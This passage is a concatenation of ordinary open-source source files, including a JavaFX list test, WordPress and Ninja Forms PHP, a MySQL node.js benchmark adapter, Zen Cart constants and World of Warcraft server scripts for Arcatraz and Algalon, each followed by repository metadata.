try {
it.remove();
} catch (ConcurrentModificationException e) {
}
assertCallCount(1);
}
@Test
public void testConcurrencyIteratorAdd() {
boolean exception = false;
ListIterator<String> it = list.listIterator();
it.next();
list.add("x");
assertCallCount(1);
try {
it.add("g");
} catch (ConcurrentModificationException e) {
}
assertCallCount(1);
}
@Test
public void testConcurrencyIteratorSet() {
boolean exception = false;
ListIterator<String> it = list.listIterator();
it.next();
list.add("x");
assertCallCount(1);
try {
it.set("p");
} catch (ConcurrentModificationException e) {
}
assertCallCount(1);
}
@Test(expected=ConcurrentModificationException.class)
public void testConcurrencyIteratorIterator() {
ListIterator<String> it1 = list.listIterator();
ListIterator<String> it2 = list.listIterator();
it1.next();
it2.next();
it1.remove();
it2.remove();
}
@Test
public void testNonConcurrency() {
ListIterator<String> it = list.listIterator();
it.next();
it.remove();
it.next();
it.remove();
it.add("foo");
it.add("bar");
it.previous();
it.set("foobar");
}
@Test
public void testSubListCreatedOnChangeValid() {
final List<List<? extends String>> subLists = new ArrayList<>();
list.addListener((ListChangeListener<String>) c -> {
subLists.add(c.getList().subList(0, 1));
});
list.add("abc");
assertEquals(1, subLists.size());
subLists.get(0).size(); // Assert not throwing Exception
subLists.clear();
list.add(0, "abc");
assertEquals(1, subLists.size());
subLists.get(0).size(); // Assert not throwing Exception
subLists.clear();
list.addAll(0, Arrays.asList("abc", "bcd"));
assertEquals(1, subLists.size());
subLists.get(0).size(); // Assert not throwing Exception
subLists.clear();
list.addAll(Arrays.asList("abc", "bcd"));
assertEquals(1, subLists.size());
subLists.get(0).size(); // Assert not throwing Exception
subLists.clear();
list.remove(0);
assertEquals(1, subLists.size());
subLists.get(0).size(); // Assert not throwing Exception
subLists.clear();
list.remove("abc");
assertEquals(1, subLists.size());
subLists.get(0).size(); // Assert not throwing Exception
subLists.clear();
list.removeAll("abc");
assertEquals(1, subLists.size());
subLists.get(0).size(); // Assert not throwing Exception
subLists.clear();
list.retainAll("bcd");
assertEquals(1, subLists.size());
subLists.get(0).size(); // Assert not throwing Exception
subLists.clear();
list.setAll("foo", "bar", "ham", "eggs");
subLists.clear();
list.subList(0, 2).add("a");
assertEquals(1, subLists.size());
subLists.get(0).size(); // Assert not throwing Exception
subLists.clear();
list.subList(0, 2).remove(0);
assertEquals(1, subLists.size());
subLists.get(0).size(); // Assert not throwing Exception
subLists.clear();
Iterator<String> it = list.iterator();
it.next();
it.remove();
assertEquals(1, subLists.size());
subLists.get(0).size(); // Assert not throwing Exception
subLists.clear();
list.listIterator().add("abc");
assertEquals(1, subLists.size());
subLists.get(0).size(); // Assert not throwing Exception
subLists.clear();
}
}
| teamfx/openjfx-8u-dev-rt | modules/base/src/test/java/javafx/collections/VetoableObservableListTest.java | Java | gpl-2.0 | 15,865 |
<script type="text/html" id="vc_teaser-button">
<div class="vc_teaser-checkbox">
<label class="vc_teaser-button-label vc_teaser-label-{{ value }}"><input
class="vc_teaser-button vc_teaser-btn-{{ value }}" type="checkbox" value="{{value}}">
<span>{{label}}</span></label>
</div>
</script>
<script type="text/html" id="vc_teaser-title">
<div class="vc_teaser-control vc_teaser-ctr-{{ name }}" data-control="{{ name }}" id="vc_teaser-title-control">
<div class="vc_move"></div>
<span></span>
<div class="vc_link-controls">
<?php _e( 'Link to', LANGUAGE_ZONE ) ?>: <a href="#"
class="vc_link-control{{ link === 'none' ? ' vc_active-link' : ''}}"
data-link="none"><?php _e( 'No link', LANGUAGE_ZONE ) ?></a>
| <a href="#" class="vc_link-control{{ link === 'post' ? ' vc_active-link' : ''}}"
data-link="post"><?php _e( 'On post', LANGUAGE_ZONE ) ?></a>
| <a href="#" class="vc_link-control{{ link === 'big_image' ? ' vc_active-link' : ''}}"
data-link="big_image"><?php _e( 'Big image', LANGUAGE_ZONE ) ?></a>
</div>
</div>
</script>
<script type="text/html" id="vc_teaser-image">
<div class="vc_teaser-control vc_teaser-ctr-{{ name }}" data-control="{{ name }}" id="vc_teaser-image-control">
<div class="vc_move"></div>
<div class="vc_buttons">
<a href="#" class="vc_teaser-image-featured"
data-mode="featured"><?php _e( 'Featured', LANGUAGE_ZONE ) ?></a> |
<a href="#" class="vc_teaser-image-custom" data-mode="custom"><?php _e( 'Custom', LANGUAGE_ZONE ) ?></a>
</div>
<div class="vc_image">
</div>
<div class="vc_link-controls">
<?php _e( 'Link to', LANGUAGE_ZONE ) ?>: <a href="#"
class="vc_link-control{{ link === 'none' ? ' vc_active-link' : ''}}"
data-link="none"><?php _e( 'No link', LANGUAGE_ZONE ) ?></a>
| <a href="#" class="vc_link-control{{ link === 'post' ? ' vc_active-link' : ''}}"
data-link="post"><?php _e( 'On post', LANGUAGE_ZONE ) ?></a>
| <a href="#" class="vc_link-control{{ link === 'big_image' ? ' vc_active-link' : ''}}"
data-link="big_image"><?php _e( 'Big image', LANGUAGE_ZONE ) ?></a>
</div>
</div>
</script>
<script type="text/html" id="vc_teaser-text">
<div class="vc_teaser-control vc_teaser-ctr-{{ name }}" data-control="{{ name }}" id="vc_teaser-text-control">
<div class="vc_move"></div>
<div class="vc_buttons">
<a href="#" class="vc_teaser-text-excerpt vc_teaser-text-control"
data-mode="excerpt"><?php _e( 'Excerpt', LANGUAGE_ZONE ) ?></a> |
<a href="#" class="vc_teaser-text-text vc_teaser-text-control"
data-mode="text"><?php _e( 'Text', LANGUAGE_ZONE ) ?></a> |
<a href="#" class="vc_teaser-text-custom vc_teaser-text-control"
data-mode="custom"><?php _e( 'Custom', LANGUAGE_ZONE ) ?></a>
</div>
<div class="vc_text">
</div>
</div>
</script>
<script type="text/html" id="vc_teaser-link">
<div class="vc_teaser-control vc_teaser-ctr-{{ name }}" data-control="{{ name }}" id="vc_teaser-link-control">
<div class="vc_move"></div>
<a href="#"><?php _e( 'Read more', LANGUAGE_ZONE ) ?></a>
</div>
</script>
<script type="text/html" id="vc_teaser-custom-image-block">
<div class="vc_custom">
<div class="vc_teaser-custom-image-view">
</div>
<a class="vc_teaser_add_custom_image" href="#"
title="<?php _e( 'Add custom image', LANGUAGE_ZONE ) ?>"><?php _e( 'Add custom image', LANGUAGE_ZONE ) ?></a>
</div>
</script>
<script type="text/html" id="vc_teaser-custom-image">
<a href="#" class="vc_teaser_add_custom_image" style="width: 266px; text-align: center;">
<img rel="<%= id %>" src="<%= url %>"/>
</a>
</script> | wiljenum/wordpress-jo | wp-content/themes/dt-the7/wpbakery/js_composer/include/templates/teaser.html.php | PHP | gpl-2.0 | 3,650 |
/*
Copyright (c) 2013, Oracle and/or its affiliates. All rights
reserved.
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License, version 2.0,
as published by the Free Software Foundation.
This program is also distributed with certain software (including
but not limited to OpenSSL) that is licensed under separate terms,
as designated in a particular file or component or in included license
documentation. The authors of MySQL hereby grant you an additional
permission to link the program and your derivative works with the
separately licensed software that they have included with MySQL.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License, version 2.0, for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
02110-1301 USA
*/
'use strict';
var spi = require('../Adapter/impl/SPI.js'),
dbt_module = require('../Adapter/impl/common/DBTableHandler.js'),
DBTableHandler = dbt_module.DBTableHandler,
unified_debug = require('../Adapter/api/unified_debug.js'),
udebug = unified_debug.getLogger('jscrund_dbspi.js');
function implementation() {
};
implementation.prototype = {
dbServiceProvider : null,
dbConnPool : null,
dbSession : null,
inBatchMode : false,
operations : null
};
implementation.prototype.getDefaultProperties = function(adapter) {
this.dbServiceProvider = spi.getDBServiceProvider(adapter);
return this.dbServiceProvider.getDefaultConnectionProperties();
};
implementation.prototype.close = function(callback) {
var impl = this;
impl.dbSession.close(function() { impl.dbConnPool.close(callback); });
};
implementation.prototype.initialize = function(options, callback) {
udebug.log("initialize");
var impl = this;
var mappings = options.annotations;
var nmappings = mappings.length;
function getMapping(n) {
function gotMapping(err, tableMetadata) {
udebug.log("gotMapping", n);
nmappings--;
var dbt = new DBTableHandler(tableMetadata, mappings[n].prototype.mynode.mapping,
mappings[n]);
udebug.log("Got DBTableHandler", dbt);
mappings[n].dbt = dbt;
if(nmappings == 0) {
callback(null); /* All done */
}
}
impl.dbConnPool.getTableMetadata(options.properties.database,
mappings[n].prototype.mynode.mapping.table,
impl.dbSession, gotMapping);
}
function onDbSession(err, dbSession) {
var n;
if(err) { callback(err, null); }
else {
impl.dbSession = dbSession;
if(mappings.length) {
for(n = 0 ; n < mappings.length ; n++) { getMapping(n); }
}
else {
callback(null);
}
}
}
function onConnect(err, dbConnectionPool) {
impl.dbConnPool = dbConnectionPool;
if(err) { callback(err, null); }
else {
dbConnectionPool.getDBSession(1, onDbSession);
}
}
impl.dbServiceProvider.connect(options.properties, onConnect);
};
implementation.prototype.execOneOperation = function(op, tx, callback, row) {
if(this.inBatchMode) {
this.operations.push(op);
}
else {
tx.execute([op], function(err) { if(err) console.log("TX EXECUTE ERR:", err, row); });
}
};
implementation.prototype.persist = function(parameters, callback) {
udebug.log_detail('persist object:', parameters.object);
var dbt = parameters.object.constructor.dbt;
var tx = this.dbSession.getTransactionHandler();
var op = this.dbSession.buildInsertOperation(dbt, parameters.object, tx, callback);
this.execOneOperation(op, tx, callback, parameters.object);
};
implementation.prototype.find = function(parameters, callback) {
udebug.log_detail('find key:', parameters.key);
var dbt = parameters.object.constructor.dbt;
var tx = this.dbSession.getTransactionHandler();
var index = dbt.getIndexHandler(parameters.key, true);
var op = this.dbSession.buildReadOperation(index, parameters.key, tx, callback);
this.execOneOperation(op, tx, callback);
};
implementation.prototype.remove = function(parameters, callback) {
udebug.log_detail('remove key:', parameters.key);
var dbt = parameters.object.constructor.dbt;
var tx = this.dbSession.getTransactionHandler();
var index = dbt.getIndexHandler(parameters.key, true);
var op = this.dbSession.buildDeleteOperation(index, parameters.key, tx, callback);
this.execOneOperation(op, tx, callback);
};
implementation.prototype.createBatch = function(callback) {
udebug.log_detail('createBatch');
this.operations = [];
this.inBatchMode = true;
callback(null);
};
implementation.prototype.executeBatch = function(callback) {
udebug.log_detail('executeBatch');
this.inBatchMode = false;
this.dbSession.getTransactionHandler().execute(this.operations, callback);
};
implementation.prototype.begin = function(callback) {
udebug.log_detail('begin');
this.dbSession.begin();
callback(null);
};
implementation.prototype.commit = function(callback) {
udebug.log_detail('commit');
this.dbSession.commit(callback);
};
exports.implementation = implementation;
| greenlion/mysql-server | storage/ndb/nodejs/perftest/jscrund_dbspi.js | JavaScript | gpl-2.0 | 5,523 |
<?php
/**
* Constants used by the zen_update_orders_history function.
*
* @copyright Copyright 2003-2020 Zen Cart Development Team
* @copyright Portions Copyright 2003 osCommerce
* @license http://www.zen-cart.com/license/2_0.txt GNU Public License V2.0
* @version $Id: Steve 2020 May 27 Modified in v1.5.7 $
*/
define('OSH_EMAIL_SEPARATOR', '------------------------------------------------------');
define('OSH_EMAIL_TEXT_SUBJECT', 'Order Update');
define('OSH_EMAIL_TEXT_ORDER_NUMBER', 'Order Number:');
define('OSH_EMAIL_TEXT_INVOICE_URL', 'Order Details:');
define('OSH_EMAIL_TEXT_DATE_ORDERED', 'Date Ordered:');
define('OSH_EMAIL_TEXT_COMMENTS_UPDATE', '<em>The comments for your order are: </em>');
define('OSH_EMAIL_TEXT_STATUS_UPDATED', 'Your order\'s status has been updated:' . "\n");
define('OSH_EMAIL_TEXT_STATUS_NO_CHANGE', 'Your order\'s status has not changed:' . "\n");
define('OSH_EMAIL_TEXT_STATUS_LABEL', '<strong>Current status: </strong> %s' . "\n\n");
define('OSH_EMAIL_TEXT_STATUS_CHANGE', '<strong>Old status:</strong> %1$s, <strong>New status:</strong> %2$s' . "\n\n");
define('OSH_EMAIL_TEXT_STATUS_PLEASE_REPLY', 'Please reply to this email if you have any questions.' . "\n");
| barco57/zencart | admin/includes/languages/english/extra_definitions/orders_status_updates_admin.php | PHP | gpl-2.0 | 1,214 |
/* Copyright (C) 2006 - 2008 ScriptDev2 <https://scriptdev2.svn.sourceforge.net/>
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software
* Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
*/
/* ScriptData
SDName: Arcatraz
SD%Complete: 60
SDComment: Warden Mellichar, event controller for Skyriss event. Millhouse Manastorm. TODO: make better combatAI for Millhouse.
SDCategory: Tempest Keep, The Arcatraz
EndScriptData */
/* ContentData
npc_millhouse_manastorm
npc_warden_mellichar
mob_zerekethvoidzone
EndContentData */
#include "ScriptPCH.h"
#include "arcatraz.h"
/*#####
# npc_millhouse_manastorm
#####*/
#define SAY_INTRO_1 -1552010
#define SAY_INTRO_2 -1552011
#define SAY_WATER -1552012
#define SAY_BUFFS -1552013
#define SAY_DRINK -1552014
#define SAY_READY -1552015
#define SAY_KILL_1 -1552016
#define SAY_KILL_2 -1552017
#define SAY_PYRO -1552018
#define SAY_ICEBLOCK -1552019
#define SAY_LOWHP -1552020
#define SAY_DEATH -1552021
#define SAY_COMPLETE -1552022
#define SPELL_CONJURE_WATER 36879
#define SPELL_ARCANE_INTELLECT 36880
#define SPELL_ICE_ARMOR 36881
#define SPELL_ARCANE_MISSILES 33833
#define SPELL_CONE_OF_COLD 12611
#define SPELL_FIRE_BLAST 13341
#define SPELL_FIREBALL 14034
#define SPELL_FROSTBOLT 15497
#define SPELL_PYROBLAST 33975
struct npc_millhouse_manastormAI : public ScriptedAI
{
npc_millhouse_manastormAI(Creature *c) : ScriptedAI(c)
{
pInstance = c->GetInstanceData();
}
ScriptedInstance* pInstance;
uint32 EventProgress_Timer;
uint32 Phase;
bool Init;
bool LowHp;
uint32 Pyroblast_Timer;
uint32 Fireball_Timer;
void Reset()
{
EventProgress_Timer = 2000;
LowHp = false;
Init = false;
Phase = 1;
Pyroblast_Timer = 1000;
Fireball_Timer = 2500;
if (pInstance)
{
if (pInstance->GetData(TYPE_WARDEN_2) == DONE)
Init = true;
if (pInstance->GetData(TYPE_HARBINGERSKYRISS) == DONE)
{
DoScriptText(SAY_COMPLETE, me);
}
}
}
void AttackStart(Unit* pWho)
{
if (me->Attack(pWho, true))
{
me->AddThreat(pWho, 0.0f);
me->SetInCombatWith(pWho);
pWho->SetInCombatWith(me);
me->GetMotionMaster()->MoveChase(pWho, 25.0f);
}
}
void EnterCombat(Unit *who)
{
}
void KilledUnit(Unit *victim)
{
switch(rand()%2)
{
case 0: DoScriptText(SAY_KILL_1, me); break;
case 1: DoScriptText(SAY_KILL_2, me); break;
}
}
void JustDied(Unit *victim)
{
DoScriptText(SAY_DEATH, me);
/*for questId 10886 (heroic mode only)
if (pInstance && pInstance->GetData(TYPE_HARBINGERSKYRISS) != DONE)
->FailQuest();*/
}
void UpdateAI(const uint32 diff)
{
if (!Init)
{
if (EventProgress_Timer <= diff)
{
if (Phase < 8)
{
switch(Phase)
{
case 1:
DoScriptText(SAY_INTRO_1, me);
EventProgress_Timer = 18000;
break;
case 2:
DoScriptText(SAY_INTRO_2, me);
EventProgress_Timer = 18000;
break;
case 3:
DoScriptText(SAY_WATER, me);
DoCast(me,SPELL_CONJURE_WATER);
EventProgress_Timer = 7000;
break;
case 4:
DoScriptText(SAY_BUFFS, me);
DoCast(me,SPELL_ICE_ARMOR);
EventProgress_Timer = 7000;
break;
case 5:
DoScriptText(SAY_DRINK, me);
DoCast(me,SPELL_ARCANE_INTELLECT);
EventProgress_Timer = 7000;
break;
case 6:
DoScriptText(SAY_READY, me);
EventProgress_Timer = 6000;
break;
case 7:
if (pInstance)
pInstance->SetData(TYPE_WARDEN_2,DONE);
Init = true;
break;
}
++Phase;
}
} else EventProgress_Timer -= diff;
}
if (!UpdateVictim())
return;
if (!LowHp && ((me->GetHealth()*100 / me->GetMaxHealth()) < 20))
{
DoScriptText(SAY_LOWHP, me);
LowHp = true;
}
if (Pyroblast_Timer <= diff)
{
if (me->IsNonMeleeSpellCasted(false))
return;
DoScriptText(SAY_PYRO, me);
DoCast(me->getVictim(),SPELL_PYROBLAST);
Pyroblast_Timer = 40000;
} else Pyroblast_Timer -=diff;
if (Fireball_Timer <= diff)
{
DoCast(me->getVictim(),SPELL_FIREBALL);
Fireball_Timer = 4000;
} else Fireball_Timer -=diff;
DoMeleeAttackIfReady();
}
};
CreatureAI* GetAI_npc_millhouse_manastorm(Creature* pCreature)
{
return new npc_millhouse_manastormAI (pCreature);
}
/*#####
# npc_warden_mellichar
#####*/
#define YELL_INTRO1 -1552023
#define YELL_INTRO2 -1552024
#define YELL_RELEASE1 -1552025
#define YELL_RELEASE2A -1552026
#define YELL_RELEASE2B -1552027
#define YELL_RELEASE3 -1552028
#define YELL_RELEASE4 -1552029
#define YELL_WELCOME -1552030
//phase 2(acid mobs)
#define ENTRY_TRICKSTER 20905
#define ENTRY_PH_HUNTER 20906
//phase 3
#define ENTRY_MILLHOUSE 20977
//phase 4(acid mobs)
#define ENTRY_AKKIRIS 20908
#define ENTRY_SULFURON 20909
//phase 5(acid mobs)
#define ENTRY_TW_DRAK 20910
#define ENTRY_BL_DRAK 20911
//phase 6
#define ENTRY_SKYRISS 20912
//TARGET_SCRIPT
#define SPELL_TARGET_ALPHA 36856
#define SPELL_TARGET_BETA 36854
#define SPELL_TARGET_DELTA 36857
#define SPELL_TARGET_GAMMA 36858
#define SPELL_TARGET_OMEGA 36852
#define SPELL_BUBBLE_VISUAL 36849
struct npc_warden_mellicharAI : public ScriptedAI
{
npc_warden_mellicharAI(Creature *c) : ScriptedAI(c)
{
pInstance = c->GetInstanceData();
}
ScriptedInstance* pInstance;
bool IsRunning;
bool CanSpawn;
uint32 EventProgress_Timer;
uint32 Phase;
void Reset()
{
IsRunning = false;
CanSpawn = false;
EventProgress_Timer = 22000;
Phase = 1;
me->SetFlag(UNIT_FIELD_FLAGS,UNIT_FLAG_NON_ATTACKABLE);
DoCast(me,SPELL_TARGET_OMEGA);
if (pInstance)
pInstance->SetData(TYPE_HARBINGERSKYRISS,NOT_STARTED);
}
void AttackStart(Unit* who) { }
void MoveInLineOfSight(Unit *who)
{
if (IsRunning)
return;
if (!me->getVictim() && who->isTargetableForAttack() && (me->IsHostileTo(who)) && who->isInAccessiblePlaceFor (me))
{
if (!me->canFly() && me->GetDistanceZ(who) > CREATURE_Z_ATTACK_RANGE)
return;
if (who->GetTypeId() != TYPEID_PLAYER)
return;
float attackRadius = me->GetAttackDistance(who)/10;
if (me->IsWithinDistInMap(who, attackRadius) && me->IsWithinLOSInMap(who))
EnterCombat(who);
}
}
void EnterCombat(Unit *who)
{
DoScriptText(YELL_INTRO1, me);
DoCast(me,SPELL_BUBBLE_VISUAL);
if (pInstance)
{
pInstance->SetData(TYPE_HARBINGERSKYRISS,IN_PROGRESS);
if (GameObject* Sphere = GameObject::GetGameObject(*me,pInstance->GetData64(DATA_SPHERE_SHIELD)))
Sphere->SetGoState(GO_STATE_READY);
IsRunning = true;
}
}
bool CanProgress()
{
if (pInstance)
{
if (Phase == 7 && pInstance->GetData(TYPE_WARDEN_4) == DONE)
return true;
if (Phase == 6 && pInstance->GetData(TYPE_WARDEN_3) == DONE)
return true;
if (Phase == 5 && pInstance->GetData(TYPE_WARDEN_2) == DONE)
return true;
if (Phase == 4)
return true;
if (Phase == 3 && pInstance->GetData(TYPE_WARDEN_1) == DONE)
return true;
if (Phase == 2 && pInstance->GetData(TYPE_HARBINGERSKYRISS) == IN_PROGRESS)
return true;
if (Phase == 1 && pInstance->GetData(TYPE_HARBINGERSKYRISS) == IN_PROGRESS)
return true;
return false;
}
return false;
}
void DoPrepareForPhase()
{
if (pInstance)
{
me->InterruptNonMeleeSpells(true);
me->RemoveSpellsCausingAura(SPELL_AURA_DUMMY);
switch(Phase)
{
case 2:
DoCast(me,SPELL_TARGET_ALPHA);
pInstance->SetData(TYPE_WARDEN_1,IN_PROGRESS);
if (GameObject *Sphere = GameObject::GetGameObject(*me,pInstance->GetData64(DATA_SPHERE_SHIELD)))
Sphere->SetGoState(GO_STATE_READY);
break;
case 3:
DoCast(me,SPELL_TARGET_BETA);
pInstance->SetData(TYPE_WARDEN_2,IN_PROGRESS);
break;
case 5:
DoCast(me,SPELL_TARGET_DELTA);
pInstance->SetData(TYPE_WARDEN_3,IN_PROGRESS);
break;
case 6:
DoCast(me,SPELL_TARGET_GAMMA);
pInstance->SetData(TYPE_WARDEN_4,IN_PROGRESS);
break;
case 7:
pInstance->SetData(TYPE_WARDEN_5,IN_PROGRESS);
break;
}
CanSpawn = true;
}
}
void UpdateAI(const uint32 diff)
{
if (!IsRunning)
return;
if (EventProgress_Timer <= diff)
{
if (pInstance)
{
if (pInstance->GetData(TYPE_HARBINGERSKYRISS) == FAIL)
Reset();
}
if (CanSpawn)
{
//continue beam omega pod, unless we are about to summon skyriss
if (Phase != 7)
DoCast(me,SPELL_TARGET_OMEGA);
switch(Phase)
{
case 2:
switch(rand()%2)
{
case 0: me->SummonCreature(ENTRY_TRICKSTER,478.326f,-148.505f,42.56f,3.19f,TEMPSUMMON_TIMED_OR_DEAD_DESPAWN,600000); break;
case 1: me->SummonCreature(ENTRY_PH_HUNTER,478.326f,-148.505f,42.56f,3.19f,TEMPSUMMON_TIMED_OR_DEAD_DESPAWN,600000); break;
}
break;
case 3:
me->SummonCreature(ENTRY_MILLHOUSE,413.292f,-148.378f,42.56f,6.27f,TEMPSUMMON_TIMED_OR_DEAD_DESPAWN,600000);
break;
case 4:
DoScriptText(YELL_RELEASE2B, me);
break;
case 5:
switch(rand()%2)
{
case 0: me->SummonCreature(ENTRY_AKKIRIS,420.179f,-174.396f,42.58f,0.02f,TEMPSUMMON_TIMED_OR_DEAD_DESPAWN,600000); break;
case 1: me->SummonCreature(ENTRY_SULFURON,420.179f,-174.396f,42.58f,0.02f,TEMPSUMMON_TIMED_OR_DEAD_DESPAWN,600000); break;
}
break;
case 6:
switch(rand()%2)
{
case 0: me->SummonCreature(ENTRY_TW_DRAK,471.795f,-174.58f,42.58f,3.06f,TEMPSUMMON_TIMED_OR_DEAD_DESPAWN,600000); break;
case 1: me->SummonCreature(ENTRY_BL_DRAK,471.795f,-174.58f,42.58f,3.06f,TEMPSUMMON_TIMED_OR_DEAD_DESPAWN,600000); break;
}
break;
case 7:
me->SummonCreature(ENTRY_SKYRISS,445.763f,-191.639f,44.64f,1.60f,TEMPSUMMON_TIMED_OR_DEAD_DESPAWN,600000);
DoScriptText(YELL_WELCOME, me);
break;
}
CanSpawn = false;
++Phase;
}
if (CanProgress())
{
switch(Phase)
{
case 1:
DoScriptText(YELL_INTRO2, me);
EventProgress_Timer = 10000;
++Phase;
break;
case 2:
DoScriptText(YELL_RELEASE1, me);
DoPrepareForPhase();
EventProgress_Timer = 7000;
break;
case 3:
DoScriptText(YELL_RELEASE2A, me);
DoPrepareForPhase();
EventProgress_Timer = 10000;
break;
case 4:
DoPrepareForPhase();
EventProgress_Timer = 15000;
break;
case 5:
DoScriptText(YELL_RELEASE3, me);
DoPrepareForPhase();
EventProgress_Timer = 15000;
break;
case 6:
DoScriptText(YELL_RELEASE4, me);
DoPrepareForPhase();
EventProgress_Timer = 15000;
break;
case 7:
DoPrepareForPhase();
EventProgress_Timer = 15000;
break;
}
}
} else EventProgress_Timer -= diff;
}
};
CreatureAI* GetAI_npc_warden_mellichar(Creature* pCreature)
{
return new npc_warden_mellicharAI (pCreature);
}
/*#####
# mob_zerekethvoidzone (this script probably not needed in future -> `creature_template_addon`.`auras`='36120 0')
#####*/
#define SPELL_VOID_ZONE_DAMAGE 36120
struct mob_zerekethvoidzoneAI : public ScriptedAI
{
mob_zerekethvoidzoneAI(Creature *c) : ScriptedAI(c) {}
void Reset()
{
me->SetUInt32Value(UNIT_NPC_FLAGS,0);
me->setFaction(16);
me->SetFlag(UNIT_FIELD_FLAGS, UNIT_FLAG_NOT_SELECTABLE);
DoCast(me,SPELL_VOID_ZONE_DAMAGE);
}
void EnterCombat(Unit* who) {}
};
CreatureAI* GetAI_mob_zerekethvoidzoneAI(Creature* pCreature)
{
return new mob_zerekethvoidzoneAI (pCreature);
}
void AddSC_arcatraz()
{
Script *newscript;
newscript = new Script;
newscript->Name = "npc_millhouse_manastorm";
newscript->GetAI = &GetAI_npc_millhouse_manastorm;
newscript->RegisterSelf();
newscript = new Script;
newscript->Name = "npc_warden_mellichar";
newscript->GetAI = &GetAI_npc_warden_mellichar;
newscript->RegisterSelf();
newscript = new Script;
newscript->Name = "mob_zerekethvoidzone";
newscript->GetAI = &GetAI_mob_zerekethvoidzoneAI;
newscript->RegisterSelf();
}
| VovchiK/federation | src/scripts/Outland/TempestKeep/arcatraz/arcatraz.cpp | C++ | gpl-2.0 | 16,525 |
<?php if ( ! defined( 'ABSPATH' ) ) exit;
/**
* Class NF_Fields_Product
*/
class NF_Fields_Product extends NF_Abstracts_Input
{
protected $_name = 'product';
protected $_section = 'pricing';
protected $_icon = 'tag';
protected $_aliases = array();
protected $_type = 'product';
protected $_templates = array( 'product', 'textbox', 'hidden', 'listselect' );
protected $_test_value = '0';
protected $processing_fields = array( 'quantity', 'modifier', 'shipping', 'tax', 'total' );
protected $_settings = array( 'product_use_quantity', 'product_price', 'product_type', 'product_type' );
protected $_settings_exclude = array( 'input_limit_set' );
public function __construct()
{
parent::__construct();
$this->_nicename = __( 'Product', 'ninja-forms' );
$this->_settings[ 'product_price' ][ 'width' ] = 'full';
$this->_settings[ 'required' ][ 'deps' ][ 'product_use_quantity' ] = 1;
add_filter( 'ninja_forms_merge_tag_value_product', array( $this, 'merge_tag_value' ), 10, 2 );
add_filter( 'ninja_forms_localize_field_' . $this->_name, array( $this, 'filter_required_setting' ) );
add_filter( 'ninja_forms_localize_field_' . $this->_name . '_preview', array( $this, 'filter_required_setting_preview' ) );
}
public function process( $product, $data )
{
$related = array();
foreach( $data[ 'fields' ] as $key => $field ){
if( ! in_array( $field[ 'type' ], $this->processing_fields ) ) continue;
$type = $field[ 'type' ];
if( ! isset( $field[ 'product_assignment' ] ) ) continue;
if( $product[ 'id' ] != $field[ 'product_assignment' ] ) continue;
$related[ $type ] = &$data[ 'fields' ][ $key ]; // Assign by reference
}
$total = floatval( $product[ 'product_price' ] );
if( isset( $related[ 'quantity' ][ 'value' ] ) && $related[ 'quantity' ][ 'value' ] ){
$total = $total * $related[ 'quantity' ][ 'value' ];
} elseif( $product[ 'product_use_quantity'] && $product[ 'value' ] ){
$total = $total * $product[ 'value' ];
}
if( isset( $related[ 'modifier' ] ) ){
//TODO: Handle multiple modifiers.
}
$data[ 'product_totals' ][] = number_format( $total, 2 );
return $data;
}
/**
* Validate
*
* @param $field
* @param $data
* @return array $errors
*/
public function validate( $field, $data )
{
$errors = array();
if( isset( $field[ 'product_use_quantity' ] ) && 1 == $field[ 'product_use_quantity' ] ){
// Required check.
if( isset( $field['required'] ) && 1 == $field['required'] && ! trim( $field['value'] ) ){
$errors[] = 'Field is required.';
}
}
return $errors;
}
public function filter_required_setting( $field )
{
if( 0 == $field->get_setting( 'product_use_quantity', 0 ) ) {
$field->update_setting('required', 0);
}
return $field;
}
public function filter_required_setting_preview( $field )
{
if( ! isset( $field[ 'settings' ][ 'product_use_quantity' ] ) || 1 != $field[ 'settings' ][ 'product_use_quantity' ] ) {
$field[ 'settings' ][ 'required' ] = 0;
}
return $field;
}
public function merge_tag_value( $value, $field )
{
$product_price = ( isset( $field[ 'product_price' ] ) ) ? str_replace( '$', '', $field[ 'product_price' ] ) : 0;
$product_quantity = ( isset( $field[ 'product_use_quantity' ] ) && 1 == $field[ 'product_use_quantity' ] ) ? $value : 1;
// TODO: Extract a higher level currency formatting based on settings.
return '$' . number_format( $product_price * $product_quantity, 2 );
}
}
| BobRazoswki/ddp | wp-content/plugins/ninja-forms/includes/Fields/Product.php | PHP | gpl-2.0 | 3,910 |
/*
* Copyright (C) 2008-2017 TrinityCore <http://www.trinitycore.org/>
*
* This program is free software; you can redistribute it and/or modify it
* under the terms of the GNU General Public License as published by the
* Free Software Foundation; either version 2 of the License, or (at your
* option) any later version.
*
* This program is distributed in the hope that it will be useful, but WITHOUT
* ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
* FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for
* more details.
*
* You should have received a copy of the GNU General Public License along
* with this program. If not, see <http://www.gnu.org/licenses/>.
*/
#include "ScriptMgr.h"
#include "DBCStores.h"
#include "GameObject.h"
#include "GameObjectAI.h"
#include "InstanceScript.h"
#include "Map.h"
#include "MotionMaster.h"
#include "MoveSplineInit.h"
#include "ObjectAccessor.h"
#include "PassiveAI.h"
#include "Player.h"
#include "ScriptedCreature.h"
#include "Spell.h"
#include "SpellInfo.h"
#include "SpellScript.h"
#include "TemporarySummon.h"
#include "ulduar.h"
enum Texts
{
SAY_BRANN_ALGALON_INTRO_1 = 0,
SAY_BRANN_ALGALON_INTRO_2 = 1,
SAY_BRANN_ALGALON_OUTRO = 2,
SAY_ALGALON_INTRO_1 = 0,
SAY_ALGALON_INTRO_2 = 1,
SAY_ALGALON_INTRO_3 = 2,
SAY_ALGALON_START_TIMER = 3,
SAY_ALGALON_AGGRO = 4,
SAY_ALGALON_COLLAPSING_STAR = 5,
EMOTE_ALGALON_COLLAPSING_STAR = 6,
SAY_ALGALON_BIG_BANG = 7,
